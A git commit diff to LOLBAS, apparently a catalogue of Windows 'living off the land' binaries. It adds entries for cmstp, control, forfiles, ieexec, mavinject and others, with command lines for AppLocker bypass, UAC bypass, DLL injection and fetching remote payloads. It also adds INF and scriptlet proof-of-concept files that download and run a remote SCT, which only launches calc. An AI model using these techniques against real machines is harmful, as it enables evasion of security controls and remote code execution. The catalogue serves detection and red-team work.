Added some more
parent
cde3fc7f7f
commit
5e169efd74
|
@ -14,7 +14,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
|
||||||
[Ie4unit.exe](OSBinaries/Ie4unit.md)
|
[Ie4unit.exe](OSBinaries/Ie4unit.md)
|
||||||
[Infdefaultinstall.exe](OSBinaries/Infdefaultinstall.md)
|
[Infdefaultinstall.exe](OSBinaries/Infdefaultinstall.md)
|
||||||
[Installutil.exe](OSBinaries/Installutil.md)
|
[Installutil.exe](OSBinaries/Installutil.md)
|
||||||
[Mavinject32.exe](OSBinaries/Mavinject32.md)
|
[Mavinject.exe](OSBinaries/Mavinject.md)
|
||||||
[Msbuild.exe](OSBinaries/Msbuild.md)
|
[Msbuild.exe](OSBinaries/Msbuild.md)
|
||||||
[Msdt.exe](OSBinaries/Msdt.md)
|
[Msdt.exe](OSBinaries/Msdt.md)
|
||||||
[Mshta.exe](OSBinaries/Mshta.md)
|
[Mshta.exe](OSBinaries/Mshta.md)
|
||||||
|
|
|
@ -8,3 +8,21 @@ ATBroker.exe /start malware
|
||||||
|
|
||||||
Acknowledgements:
|
Acknowledgements:
|
||||||
* Adam - @hexacorn
|
* Adam - @hexacorn
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
* Missing
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
C:\Windows\System32\Atbroker.exe
|
||||||
|
C:\Windows\SysWOW64\Atbroker.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
Not certain if it works on Windows 10.
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -1,11 +1,37 @@
|
||||||
## CMSTP.exe
|
## Cmstp.exe
|
||||||
|
|
||||||
* Functions: Execute
|
* Functions: Execute, UACBypass
|
||||||
|
|
||||||
```
|
```
|
||||||
cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
|
cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
|
||||||
|
|
||||||
|
cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payloads/Cmstp.inf
|
||||||
```
|
```
|
||||||
|
|
||||||
Acknowledgements:
|
Acknowledgements:
|
||||||
* Oddvar Moe - @oddvarmoe
|
* Oddvar Moe - @oddvarmoe
|
||||||
* Nick Tyrer - @NickTyrer
|
* Nick Tyrer - @NickTyrer
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
* [Cmstp.inf](Payloads/Cmstp.inf)
|
||||||
|
* [Cmstp_calc.sct](Payloads/Cmstp_calc.sct)
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://twitter.com/NickTyrer/status/958450014111633408
|
||||||
|
* https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
|
||||||
|
* https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e
|
||||||
|
* https://oddvar.moe/2017/08/15/research-on-cmstp-exe/
|
||||||
|
* https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1 (UAC Bypass)
|
||||||
|
* https://github.com/hfiref0x/UACME
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
C:\Windows\system32\cmstp.exe
|
||||||
|
C:\Windows\sysWOW64\cmstp.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -1,16 +1,34 @@
|
||||||
## Control.exe
|
## Control.exe
|
||||||
|
|
||||||
* Functions: Execute
|
* Functions: Execute, Read ADS
|
||||||
|
|
||||||
```
|
```
|
||||||
control.exe c:\windows\tasks\file.txt:evil.dll
|
control.exe c:\windows\tasks\file.txt:evil.dll
|
||||||
|
|
||||||
control.exe
|
|
||||||
(Add registry in HKCU\Software\Microsoft\Windows\currentversion\controlpanel\CPLS to manipulate)
|
|
||||||
```
|
```
|
||||||
|
|
||||||
Acknowledgements:
|
Acknowledgements:
|
||||||
* Jimmy - @bohops
|
* Jimmy - @bohops
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
*
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
|
||||||
|
* https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/
|
||||||
|
* https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/
|
||||||
|
* https://twitter.com/bohops/status/955659561008017409
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
C:\Windows\system32\control.exe
|
||||||
|
C:\Windows\sysWOW64\control.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
Add registry in HKCU\Software\Microsoft\Windows\currentversion\controlpanel\CPLS to manipulate.
|
||||||
|
```
|
||||||
|
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cpls"
|
||||||
|
/v EvilCPL.cpl /t REG_SZ /d "C:\Folder\EvilCPL.cpl"
|
||||||
|
```
|
||||||
|
|
||||||
|
|
|
@ -1,10 +1,32 @@
|
||||||
## Forfiles.exe
|
## Forfiles.exe
|
||||||
|
|
||||||
* Functions: Execute
|
* Functions: Execute, Read ADS
|
||||||
|
|
||||||
```
|
```
|
||||||
forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
|
forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
|
||||||
|
forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
|
||||||
```
|
```
|
||||||
|
|
||||||
Acknowledgements:
|
Acknowledgements:
|
||||||
* Eric - @vector_sec
|
* Eric - @vector_sec
|
||||||
|
* Oddvar Moe - @oddvarmoe
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
*
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://twitter.com/vector_sec/status/896049052642533376
|
||||||
|
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||||
|
* https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
C:\Windows\system32\forfiles.exe
|
||||||
|
C:\Windows\sysWOW64\forfiles.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -1,12 +1,29 @@
|
||||||
## ie4unit.exe
|
## Ie4unit.exe
|
||||||
|
|
||||||
* Functions: Execute
|
* Functions: Execute
|
||||||
|
|
||||||
```
|
```
|
||||||
ie4unit.exe -BaseSettings
|
ie4unit.exe -BaseSettings
|
||||||
(copy out ie4unit.exe and ieuinit.inf - add SCT in the MSIE4RegisterOCX.Windows7 section)
|
|
||||||
```
|
```
|
||||||
|
|
||||||
Acknowledgements:
|
Acknowledgements:
|
||||||
* Jimmy - @bohops
|
* Jimmy - @bohops
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
*
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
c:\windows\system32\ie4unit.exe
|
||||||
|
c:\windows\sysWOW64\ie4unit.exe
|
||||||
|
c:\windows\system32\ieuinit.inf
|
||||||
|
c:\windows\sysWOW64\ieuinit.inf
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
copy out ie4unit.exe and ieuinit.inf - add SCT in the MSIE4RegisterOCX.Windows7 section
|
||||||
|
|
||||||
|
|
|
@ -7,4 +7,22 @@ ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||||
```
|
```
|
||||||
|
|
||||||
Acknowledgements:
|
Acknowledgements:
|
||||||
* ?
|
* Casey Smith - @subtee
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
*
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
c:\windows\system32\ieexec.exe
|
||||||
|
c:\windows\sysWOW64\ieexec.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -3,8 +3,29 @@
|
||||||
* Functions: Execute
|
* Functions: Execute
|
||||||
|
|
||||||
```
|
```
|
||||||
InfDefaultInstall.exe shady.inf
|
InfDefaultInstall.exe Infdefaultinstall.inf
|
||||||
```
|
```
|
||||||
|
|
||||||
Acknowledgements:
|
Acknowledgements:
|
||||||
* Kyle Hanslovan - @kylehanslovan
|
* Kyle Hanslovan - @kylehanslovan
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
* [Infdefaultinstall.inf](Payload/Infdefaultinstall.inf)
|
||||||
|
* [Infdefaultinstall_calc.sct](Payload/Infdefaultinstall_calc.sct)
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://twitter.com/KyleHanslovan/status/911997635455852544
|
||||||
|
* https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
|
||||||
|
* https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
c:\windows\system32\Infdefaultinstall.exe
|
||||||
|
c:\windows\sysWOW64\Infdefaultinstall.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
Some specific details about the binary file.
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -8,3 +8,31 @@ InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
||||||
|
|
||||||
Acknowledgements:
|
Acknowledgements:
|
||||||
* Casey Smith - @subtee
|
* Casey Smith - @subtee
|
||||||
|
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
* [AllTheThingsX64.dll - Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)
|
||||||
|
* [AllTheThingsX32.dll - Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx32.dll)
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
|
||||||
|
* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
|
||||||
|
* http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html
|
||||||
|
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/InstallUtil.md
|
||||||
|
* https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/
|
||||||
|
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
|
||||||
|
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
|
||||||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,32 @@
|
||||||
|
## Mavinject.exe
|
||||||
|
|
||||||
|
* Functions: Execute
|
||||||
|
|
||||||
|
```
|
||||||
|
MavInject.exe <PID> /INJECTRUNNING <PATH DLL>
|
||||||
|
|
||||||
|
MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll>
|
||||||
|
```
|
||||||
|
|
||||||
|
Acknowledgements:
|
||||||
|
* Giuseppe N3mes1s - @gN3mes1s
|
||||||
|
* Adam - @hexacorn
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
*
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://twitter.com/gN3mes1s/status/941315826107510784
|
||||||
|
* https://twitter.com/Hexacorn/status/776122138063409152
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
C:\Windows\System32\mavinject.exe
|
||||||
|
C:\Windows\SysWOW64\mavinject.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -1,14 +0,0 @@
|
||||||
## Mavinject32.exe
|
|
||||||
|
|
||||||
* Functions: Execute
|
|
||||||
|
|
||||||
```
|
|
||||||
MavInject32.exe <PID> /INJECTRUNNING <PATH DLL>
|
|
||||||
|
|
||||||
MavInject32.exe 3110 /INJECTRUNNING c:\folder\evil.dll>
|
|
||||||
```
|
|
||||||
|
|
||||||
Acknowledgements:
|
|
||||||
* Giuseppe N3mes1s - @gN3mes1s
|
|
||||||
* Adam - @hexacorn
|
|
||||||
|
|
|
@ -0,0 +1,14 @@
|
||||||
|
[version]
|
||||||
|
Signature=$chicago$
|
||||||
|
AdvancedINF=2.5
|
||||||
|
|
||||||
|
[DefaultInstall_SingleUser]
|
||||||
|
UnRegisterOCXs=UnRegisterOCXSection
|
||||||
|
|
||||||
|
[UnRegisterOCXSection]
|
||||||
|
%11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp_calc.sct
|
||||||
|
|
||||||
|
[Strings]
|
||||||
|
AppAct = "SOFTWARE\Microsoft\Connection Manager"
|
||||||
|
ServiceName="Yay"
|
||||||
|
ShortSvcName="Yay"
|
|
@ -0,0 +1,23 @@
|
||||||
|
<?XML version="1.0"?>
|
||||||
|
<scriptlet>
|
||||||
|
<registration
|
||||||
|
progid="PoC"
|
||||||
|
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
|
||||||
|
<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->
|
||||||
|
|
||||||
|
<!-- .sct files when downloaded, are executed from a path like this -->
|
||||||
|
<!-- Please Note, file extenstion does not matter -->
|
||||||
|
<!-- Though, the name and extension are arbitary.. -->
|
||||||
|
<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
|
||||||
|
<!-- Based on current research, no registry keys are written, since call "uninstall" -->
|
||||||
|
<!-- You can either execute locally, or from a url -->
|
||||||
|
<script language="JScript">
|
||||||
|
<![CDATA[
|
||||||
|
// calc.exe should launch, this could be any arbitrary code.
|
||||||
|
// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
|
||||||
|
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||||||
|
|
||||||
|
]]>
|
||||||
|
</script>
|
||||||
|
</registration>
|
||||||
|
</scriptlet>
|
|
@ -0,0 +1,8 @@
|
||||||
|
[Version]
|
||||||
|
Signature=$CHICAGO$
|
||||||
|
|
||||||
|
[DefaultInstall]
|
||||||
|
UnregisterDlls = Squiblydoo
|
||||||
|
|
||||||
|
[Squiblydoo]
|
||||||
|
11,,scrobj.dll,2,60,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Infdefaultinstall_calc.sct
|
|
@ -0,0 +1,16 @@
|
||||||
|
<?XML version="1.0"?>
|
||||||
|
<scriptlet>
|
||||||
|
<registration
|
||||||
|
progid="PoC"
|
||||||
|
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
|
||||||
|
<!-- Proof Of Concept - Casey Smith @subTee -->
|
||||||
|
<!-- License: BSD3-Clause -->
|
||||||
|
<script language="JScript">
|
||||||
|
<![CDATA[
|
||||||
|
|
||||||
|
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||||||
|
|
||||||
|
]]>
|
||||||
|
</script>
|
||||||
|
</registration>
|
||||||
|
</scriptlet>
|
|
@ -1,9 +1,10 @@
|
||||||
# Living Off The Land Binaries and Scripts
|
# Living Off The Land Binaries and Scripts
|
||||||
|
|
||||||
The goal of these lists are to document every binary and script that can be used for other purposes than they are designed to.
|
The goal of these lists are to document every binary and script that can be used for other purposes than they are designed to.
|
||||||
|
Every binary and script has it's own .md file in the subfolders. That way I should be easier to maintain and reuse.
|
||||||
|
|
||||||
There are two different lists.
|
There are two different lists.
|
||||||
|
|
||||||
[LOLBins](LOLBins.md)
|
* [LOLBins](LOLBins.md)
|
||||||
[LOLScripts](LOLScripts.md)
|
* [LOLScripts](LOLScripts.md)
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue